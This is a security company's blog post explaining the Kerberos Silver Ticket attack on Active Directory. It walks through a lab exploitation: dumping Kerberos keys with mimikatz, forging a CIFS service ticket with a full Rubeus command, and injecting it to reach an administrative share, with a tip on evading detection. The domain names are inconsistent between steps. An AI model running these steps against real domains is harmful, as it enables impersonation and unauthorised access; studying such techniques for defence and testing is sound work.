Tickets Kerberos - Silver Ticket

June 3, 2024 Celia Catalán

Continuing with the deliveries of Kerberos Tickets, in past publications we have talked about the Golden Ticket, this time we will be talking about the Silver Ticket.

SILVER TICKET

The Silver Ticket attack involves the creation of a Ticket Granting Service (TGS), which allows attackers to gain access to a specific service in an Active Directory environment without the need to authenticate through the domain controller (Key Distribution Center, KDC). ).

This method is based on acquiring the NTLM hash or password of a service account, to forge a Ticket Granting Service (TGS). These credentials can be obtained in different ways during the Domain attack, such as through tools such as Responder or through Kerberoasting techniques. After creating this spoofed ticket, an attacker can access the specific service, posing as any user, usually with the goal of gaining administrative privileges.

If instead of obtaining the credentials in clear text or NTLM hash, the AES keys could be obtained (for example, through a memory dump), it is recommended to use these AES keys for the creation of the tickets, since it is an safer and less detectable way.

Explotation:

First, let's assume that we have obtained a session as SYSTEM on a machine in the domain. This, for example, could have happened after compromising an IIS server and subsequent escalation of privileges using a Potato exploit.

After gaining control of the server, we can obtain the Kerberos keys with mimikatz and the command sekurlsa::ekeys

Ticket creation

Once the Kerberos keys have been obtained, we can create a ticket for the CIFS service of the server itself, which will guarantee us access to it as the user of the domain we want. In this case we will create the ticket with the command:

Rubeus.exe silver /service:cifs/castelblack.north.servingkingdom.local/aes256:0ad6c98bbba174b0b2f8d9a05279fe6892cef5f0e1bab59e01b5510e9920774d/user: eddard.stark/domain:north.servingkingdom. local /sid: S-1-5-21-1430251130-2586379517-4083755373 /nowrap

Service: Name of the service to which the ticket will be requested

Aes256: Aes256 key of the previously extracted machine account

User: User to be impersonalized, in this case a Domain Admin

Domain: Domain name

Sid: SID of the domain

Import the ticket

Once the ticket is obtained, we can verify that we do not have administration access to the server from our non-privileged user console.

ls \\castelblack.north.sevenkingdoms.local\C$

The next step will be to import the previously generated ticket into a new process. This can be achieved with the command:

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:NORTH /username: eddard.stark /password:PassFake /ticket: doIGGDCC[…]b2NhbA==

Program: Command to execute where the ticket will be injected

Domain: Domain name

Username: Domain user

Password: User password. It is not necessary to know the user's real password.

Ticket: The ticket created previously

After creating the process with our Silver Ticket, we can now access the server in question through the CIFS service from our non-privileged user session.

ls \\castelblack.north.sevenkingdoms.local\c$

Limitations:

A Silver Ticket is valid only for the specific service for which it was created. It does not allow access to other services or resources.

And with this we end the post, in that sense we now know about the Silver Ticket and the Golden Ticket , one more installment about these Kerberos tickets is pending. Until the next ticket.

Álvaro Temes , cybersecurity analyst at Zerolynx .

return to blog